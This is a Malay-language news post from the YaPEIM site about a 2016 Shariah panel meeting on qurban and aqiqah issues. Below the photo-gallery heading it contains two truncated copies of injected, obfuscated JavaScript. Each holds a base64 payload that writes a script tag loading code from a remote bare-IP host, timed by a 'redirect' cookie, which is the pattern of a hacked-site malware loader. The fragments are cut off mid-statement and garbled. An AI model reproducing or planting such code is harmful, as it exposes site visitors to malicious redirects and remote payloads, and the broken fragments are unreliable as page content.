YaPEIM » Mesyuarat Panel Syariah Koperasi Ibadah Qurban YaPEIM

Terkini

Mesyuarat Panel Syariah Koperasi Ibadah Qurban YaPEIM

Mesyuarat ini dapat memperjelaskan dan menyelesaikan isu-isu tentang pelaksanaan qurban dan aqiqah yang melibatkan hukum dan pemahaman dalam melaksanakan ibadah tersebut.

KUALA LUMPUR – Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) telah mengadakan Mesyuarat Panel Syariah (Khas) Tabung Ibadah Qurban YaPEIM kali ke- 3 1437H/2016 yang bertempat di Ibu Pejabat YaPEIM di Grand Seasons Avenue, Kuala Lumpur pada 14 April 2016 bersamaan 06 Rejab 1437H.

Majlis mesyuarat pada kali ini, telah dipengerusikan oleh Yang Berbahagia S. S. Tan Sri Dato’ Seri Hj.Harussani bin Hj. Zakaria, Pengerusi Panel Syariah (Khas) Tabung Ibadah Qurban YaPEIM merangkap mufti Negeri Perak. Turut hadir, Yang Berbahagia S. S. Dato’ Dr. Zulkifly bin Muda, Ahli Panel Syariah (Khas) Tabung Ibadah Qurban YaPEIM merangkap mufti Negeri Terengganu, Yang Berbahagia S.S Dato’ Wan Salim Wan Noor, Ahli Panel Syariah (Khas) Tabung Ibadah Qurban YaPEIM merangkap mufti Negeri Pulau Pinang, Yang Berbahagia Dato’ Abibullah Hj Samsudin Ketua Pengarah YaPEIM, Lembaga Pemegang Amanah YaPEIM, Pengurusan Utama YaPEIM dan pihak Koperasi Ibadah Qurban YaPEIM Berhad.

Secara keseluruhannya, sejumlah 11 isu berkaitan Ibadah qurban dan aqiqah telah dibentangkan dan dibincangkan. Antaranya, isu-isu berkaitan pengurusan ladang kontrak, hukum ke atas haiwan ternakan yang memakan sumber harta orang lain, isu istihalah dalam pemakanan haiwan dan maslahah dalam penetapan harga qurban . Selain itu, turut dibincangkan berkenaan penggunaan dana tabungan peserta Tabung Ibadah Qurban untuk tujuan pelaburan.

Kesimpulannya, mesyuarat ini dapat memperjelaskan dan menyelesaikan isu-isu tentang pelaksanaan ibadah qurban dan aqiqah yang melibatkan hukum dan pemahaman dalam melaksanakan ibadah tersebut.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top